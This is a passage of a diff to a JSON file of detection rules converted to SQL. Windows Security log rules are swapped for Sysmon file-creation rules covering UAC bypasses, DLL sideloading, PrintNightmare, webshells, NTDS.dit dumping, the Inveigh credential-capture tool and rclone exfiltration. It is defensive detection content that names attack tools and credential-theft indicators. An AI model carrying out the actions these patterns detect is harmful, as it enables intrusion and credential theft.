'%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access 
operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive 
application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC 
code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": 
"Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE 
'%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": 
"win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 
'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], "falsepositives": [ - "Unknown. Feedback welcomed." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of 
exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 
'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": 
